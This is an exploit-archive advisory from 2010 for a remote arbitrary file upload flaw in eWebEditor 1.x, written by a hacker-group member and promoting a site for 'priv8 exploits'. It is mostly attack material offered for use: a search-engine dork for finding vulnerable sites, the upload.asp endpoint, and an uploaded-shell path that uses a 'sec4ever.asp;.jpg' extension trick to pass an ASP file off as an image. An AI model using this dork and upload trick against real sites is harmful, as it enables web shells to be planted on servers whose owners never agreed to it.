eWebEditor 1.x - 'WYSIWYG' Arbitrary File Upload

EDB-ID:

12699

CVE:

N/A


Platform:

PHP

Published:

2010-05-22

=============================================================================
# Tilte: eWebEditor v1.x (WYSIWYG) Remote File Upload .
=============================================================================

#
Date....................: [22-05-2010]
# Author..................: [Ma3sTr0-Dz]
# Location ...............: [Algeria]
# Software ...............: [eWebEditor v1.x (WYSIWYG) Remote File Upload .]
# Impact..................: [Remote]
# Site Software ..........:[http://www.ewebeditor.net/]
# Sptnx ..................: [CmOs_CLR & Sec4ever Memberz.]
# Home : .................: [Www.Sec4ever.Com/home/ For Latest 2010 Localz & priv8 Exploits !]
# Contact me : ...........: [o5m@hotmail.de] 
# Vulnerability: Remote File Upload .


#
Part ExplOit & Bug Codes :

------
Dork :
------
allinurl:ewebeditor/asp/

Exploit :
---------

http://site.com/[path]/asp/upload.asp?type=file&style=coolblue&language=zh-cn

http://site.com/uploads/asp/sec4ever.asp;.jpg
-----------------------
Don't Forget : Www.Sec4ever.com/home /// Ur Secure Mind /